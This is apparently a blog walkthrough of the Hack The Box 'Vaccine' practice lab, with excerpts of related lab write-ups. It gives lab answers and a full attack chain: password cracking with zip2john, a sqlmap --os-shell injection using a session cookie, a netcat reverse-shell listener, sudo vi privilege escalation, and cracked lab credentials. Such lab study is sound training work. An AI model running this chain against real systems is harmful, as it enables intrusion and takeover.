Hack The Box :: Starting Point - Vaccine
老规矩,扫描
nmap -A 10.129.89.216 -v --open |
ftp匿名登录,有个backup.zip文件, 下载下来看下
backup.zip文件需要密码, 使用john进行破解,获取到密码 741852963
zip2john backup.zip > hash |
解压后, 查看index.php发现登录是进行hash对比, hash值是cmd5加密,解密后得到 qwerty789
cat index.php |
用上面的信息访问下我们的网站
adminqwerty789 登录
搜索框有个搜索, 尝试用sqlmap跑下看看有没有注入, 同时需要带上phpsession的cookie
sqlmap -url "http://10.129.89.216/dashboard.php?search=1" --cookie="PHPSESSID=2drpkfp389uc4skergc81mqdqs" --os-shell |
可以看到通过sqlmap获取了一个os shell
获取一个远程tty,获取地一个flag,相对来说,反弹shell 我更喜欢用msf,当然获取用户名密码以后可以直接使用ssh登录
nc -lnvp 4444 |
sudo -l看下哪些程序有特权,发现vi可以
sudo -l |
提权
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf |
Task 1 Besides SSH and HTTP, what other service is hosted on this box? 除了 SSH 和 HTTP,这个盒子上还有什么其他服务?
ftp
Task 2 This service can be configured to allow login with any password for specific username. What is that username? 此服务可以配置为允许使用特定用户名的任何密码登录。 那个用户名是什么?
anonymous
Task 3 What is the name of the file downloaded over this service? 通过此服务下载的文件的名称是什么
backup.zip
Task 4 What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? John The Ripper 工具集附带什么脚本并以允许破解尝试的格式从受密码保护的 zip 存档生成哈希?
zip2john
Task 5 What is the password for the admin user on the website? 网站上admin用户的密码是多少?
qwerty789
Task 6 What option can be passed to sqlmap to try to get command execution via the sql injection? 可以将什么选项传递给 sqlmap 以尝试通过 sql 注入执行命令
--os-shell
Task 7 What program can the postgres user run as root using sudo? postgres 用户可以使用 sudo 作为 root 运行什么程序?
vi
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Hao DevSecOps!
微信
相关推荐
2023-02-28
Hack The Box :: Starting Point - Appointment
端口扫描nmap -sV 10.129.24.207 页面为登录页面,根据提示为SQL注入,尝试用 ‘ or 1=1;# 测试admin1' or 1=1;# Task 1 What does the acronym SQL stand for? Structured Query Language Task 2 What is one of the most common type of SQL vulnerabilities? sql injection Task 3 What does PII stand for? personally identifiable information Task 4 What is the 2021 OWASP Top 10 classification for this vulnerability? A03:2021-Injection Task 5 What does Nmap report as the service and version that are running on...
2023-03-01
Hack The Box :: Starting Point - Archetype
扫描nmap 10.129.95.187 -sV 查看smb共享目录smbclient -L 10.129.95.187 获取共享文件,看到用户名 ARCHETYPE\sql_svc 密码M3g4c0rp123smbclient \\\\10.129.95.187\\backups ls get prod.dtsConfig 使用smbclient.py进行数据库连接,也可以用sqlmap,sqlmap更方便一些https://github.com/fortra/impacket #msclientpython mssqlclient.py sql_svc@10.129.95.187 -windows-auth#sqlmapsqlmap -d "mssql://ARCHETYPE\\sql_svc:M3g4c0rp123@10.129.95.187:1433/" --os-shell ...
2023-02-28
Hack The Box :: Starting Point - Crocodile
端口扫描nmap 10.129.171.69nmap 10.129.171.69 -A -p 21,80 允许匿名用户登录, 并且存在两个文件ftp 10.129.171.69 Anonymous #登录 ls #列出目录 get allowed.userlist get allowed.userlist.passwd exitcat allowed.userlistcat allowed.userlist.passwd 浏览80端口 爆破路径gobuster dir -u 10.129.171.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x .php 用上面文件的信息登录下,获得flag Task 1 What Nmap scanning switch employs the use of default scripts during a scan? -sC Task 2 What service version...
2023-02-28
Hack The Box :: Starting Point - Dancing
扫描nmap --open 10.129.1.125 查看smb服务smbclient -L 10.129.1.125#smbclient \\\\IP\\共享目录smbclient \\\\10.129.1.125\\WorkShares ls #dir也是可以的 TASK 1 What does the 3-letter acronym SMB stand for? server message block TASK 2 What port does SMB use to operate at? 445 TASK 3 What is the service name for port 445 that came up in our Nmap scan? microsoft-ds TASK 4 What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share? -L TASK 5 How many shares...
2023-02-28
Hack The Box :: Starting Point - Meow
一些名词,比较简单 TASK 1 What does the acronym VM stand for? Virtual Machine TASK 2 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell. terminal TASK 3 What service do we use to form our VPN connection into HTB labs? openvpn Task 4 What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output? tun Task 5 What tool do...
2023-02-28
Hack The Box :: Starting Point - Fawn
扫描nmap --open 10.129.26.35nmap -A -p 21 10.129.26.35 获取flagftp 10.129.26.35 anonymous ls get flag.txt cat flag.txt TASK 1 What does the 3-letter acronym FTP stand for? File Transfer Protocol TASK 2 Which port does the FTP service listen on usually? 21 TASK 3 What acronym is used for the secure version of FTP? SFTP TASK 4 What is the command we can use to send an ICMP echo request to test our connection to the target? ping TASK 5 From your scans, what version is FTP...
评论
